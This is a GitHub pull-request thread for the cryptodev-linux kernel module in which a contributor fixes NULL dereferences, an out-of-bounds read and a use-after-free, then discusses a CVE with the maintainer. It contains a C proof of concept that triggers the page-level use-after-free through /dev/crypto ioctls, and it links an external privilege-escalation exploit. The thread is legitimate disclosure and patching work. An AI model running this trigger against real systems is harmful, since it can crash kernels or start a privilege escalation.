Fixes about NULL pointer dereferences + oob read + UAF by n4sm · Pull Request #103 · cryptodev-linux/cryptodev-linux

n4sm · 2025-12-06T02:02:19Z

I fixed some bugs leading to DoS including:

A lot of different NULL pointer dereferences
A divide by zero error in cryptodev_get_dst_len
An out of bound read in crypto_copy_hash_state
UAF in release_user_pages, this bug is actually dangerous, it allows an attacker to decrement the reference counter of a struct page as many times as he wants. I do consider it as a serious security issue, if you would like to reproduce this UAF you can use the following proof of concept:

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include "../crypto/cryptodev.h"
#include "aes.h"

#define	KEY_SIZE	16
#define CIPHER_SZ 0x3000

int
main()
{
	int cfd = -1;
    struct session_op session = {0};
    struct crypt_op cryp = {0};
    uint8_t key[KEY_SIZE] = {0};
    uint8_t plaintext[CIPHER_SZ] = {0};
    uint8_t ciphertext[CIPHER_SZ] = {0};
    uint8_t iv[16] = {0};

	/* Open the crypto device */
	cfd = open("/dev/crypto", O_RDWR, 0);
	if (cfd < 0) {
		perror("open(/dev/crypto)");
		return 1;
	}

	/* Set close-on-exec (not really neede here) */
	if (fcntl(cfd, F_SETFD, 1) == -1) {
		perror("fcntl(F_SETFD)");
		return 1;
	}

	session.cipher = CRYPTO_AES_CBC;
	session.keylen = KEY_SIZE;
	session.key = (void*)key;

    if (ioctl(cfd, CIOCGSESSION, &session)) {
		perror("ioctl(CIOCGSESSION)");
		return -1;
	}

	cryp.ses = session.ses;
	cryp.len = CIPHER_SZ;
	cryp.src = plaintext;
	cryp.dst = ciphertext;
	cryp.iv = (void*)iv;
	cryp.op = COP_ENCRYPT;
	if (ioctl(cfd, CIOCCRYPT, &cryp)) {
		perror("ioctl(CIOCCRYPT)");
		return -1;
	}

	cryp.ses = session.ses;
	cryp.len = CIPHER_SZ;
	cryp.src = NULL;
	cryp.dst = (uint8_t* )0xdeadbeef;
	cryp.iv = (void*)iv;
	cryp.op = COP_ENCRYPT;
	if (ioctl(cfd, CIOCCRYPT, &cryp)) {
		perror("ioctl(CIOCCRYPT)");
		return -1;
	}

	/* Close the original descriptor */
	if (close(cfd)) {
		perror("close(cfd)");
		return 1;
	}

	return 0;
}

It will make release_user_pages call put_page on already freed pages.

cristian-stoica · 2025-12-17T07:06:27Z

authenc.c

 	}

+	// we avoid overflows
+        if ((unsigned long) caop->auth_len > (unsigned long) (caop->auth_len + caop->auth_src)) {


trivial - please consider fixing the indentation

Sure, I just fixed that.

n4sm · 2025-12-18T16:52:30Z

@cristian-stoica I think use after bug might be worth a CVE, what do you think ? I haven't developed a fully working exploit yet but I will once I get some time to work on it.

cristian-stoica · 2025-12-18T19:07:28Z

Many CVEs are now noise or just theoretical. It becomes hard to see which ones deserve any concerns. If you have time to work on a PoC then it's worth having it patched.

Regarding the PRs, I'm not following updates here daily. When you have cleaned the PR #103 I'll merge it. What I mean is to get rid of the fix-up commits so they disappear by squashing into the other relevant commits

n4sm · 2025-12-18T19:47:08Z

I do agree with you, I will come back to you with a working PoC. I will clean up the PR so you can merge it as soon as possible. Thank you for your support.

cristian-stoica · 2026-01-08T06:42:24Z

@n4sm What I’m suggesting is that it’s worthwhile to apply a patch for cryptodev even if the vulnerability is only theoretical. I don’t believe a practical exploit is required to justify addressing the issue.

When you have a moment, please squash the fixup patches into the original commits so we have a clean patch set. Thank you.

n4sm · 2026-01-11T01:50:58Z

@cristian-stoica I finished writing an exploit for it. You can find the PoC here: https://gist.github.com/n4sm/0fd2479e0c23e0fa2f192cd8fda45750. I'd say the exploit ~~has 60% chances of success, so pretty stable but not perfect~~, is totally stable in my test environment (qemu virtual machine with 2G of ram), I specified the kernel version and the compilation options at the end of the exploit if you want to test it by yourself.

Sure, I will clean the patches, how about the other issue I submitted ? The race condition seems very difficult to patch and I couldn't find a clean way to do it.

I fixed some bugs leading to DoS / privilege escalation including: - A lot of different NULL pointer dereferences - A divide by zero error in `cryptodev_get_dst_len` - An out of bound read in `crypto_copy_hash_state` - A double free in `release_user_pages` (which could lead to privilege escalation)

cristian-stoica · 2026-01-13T08:02:53Z

@n4sm Hey this is good news!
Can we take the pull requests separately or do they need to be taken together? I did not look deeply into the other one since you said you need to work on it further. What is your concern?

n4sm · 2026-01-13T08:21:05Z

@cristian-stoica I guess we need to treat them separately. My concern is that I couldn't come to a clean patch to address the UAF bug. But compared to the page-level UAF I exploited, this uaf is very tricky to exploit and might just be not suitable for a privilege escalation.

Regarding the patch submission, now that I finished writing the PoC, do you want to take care of the CVE submission process by yourself?

Btw, I wrote a small blogpost about the bug and the exploitation technique I used: https://nasm.re/posts/cryptodev-linux-vuln/

cristian-stoica · 2026-01-14T21:16:33Z

@n4sm Thanks for the update and for sharing the blog (quite a few posts you have there).

Regarding the CVE: please go ahead with the submission on your side - I won't handle the disclosure. If you need project details for the form, let me know

For the patches:

I'll merge the first one after the minor clean-up
I'll wait for the updated version of the second patch before reviewing

Ping me if you need anything specific

n4sm changed the title ~~Fix some bugs~~ Fixes about NULL pointer derefence + oob read + UAF Dec 6, 2025

n4sm changed the title ~~Fixes about NULL pointer derefence + oob read + UAF~~ Fixes about NULL pointer dereferences + oob read + UAF Dec 6, 2025

cristian-stoica reviewed Dec 17, 2025

View reviewed changes

n4sm force-pushed the master branch from 7d08561 to aed8901 Compare January 11, 2026 02:06

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Fixes about NULL pointer dereferences + oob read + UAF#103

Fixes about NULL pointer dereferences + oob read + UAF#103
n4sm wants to merge 1 commit intocryptodev-linux:masterfrom
n4sm:master

n4sm commented Dec 6, 2025

Uh oh!

cristian-stoica Dec 17, 2025

Uh oh!

n4sm Dec 17, 2025

Uh oh!

n4sm commented Dec 18, 2025

Uh oh!

cristian-stoica commented Dec 18, 2025 •

edited

Loading

Uh oh!

n4sm commented Dec 18, 2025

Uh oh!

cristian-stoica commented Jan 8, 2026

Uh oh!

n4sm commented Jan 11, 2026 •

edited

Loading

Uh oh!

cristian-stoica commented Jan 13, 2026

Uh oh!

n4sm commented Jan 13, 2026

Uh oh!

cristian-stoica commented Jan 14, 2026 •

edited

Loading

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

2 participants

Conversation

n4sm commented Dec 6, 2025

Uh oh!

cristian-stoica Dec 17, 2025

Choose a reason for hiding this comment

Uh oh!

n4sm Dec 17, 2025

Choose a reason for hiding this comment

Uh oh!

n4sm commented Dec 18, 2025

Uh oh!

cristian-stoica commented Dec 18, 2025 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Uh oh!

n4sm commented Dec 18, 2025

Uh oh!

cristian-stoica commented Jan 8, 2026

Uh oh!

n4sm commented Jan 11, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Uh oh!

cristian-stoica commented Jan 13, 2026

Uh oh!

n4sm commented Jan 13, 2026

Uh oh!

cristian-stoica commented Jan 14, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

2 participants

cristian-stoica commented Dec 18, 2025 •

edited

Loading

n4sm commented Jan 11, 2026 •

edited

Loading

cristian-stoica commented Jan 14, 2026 •

edited

Loading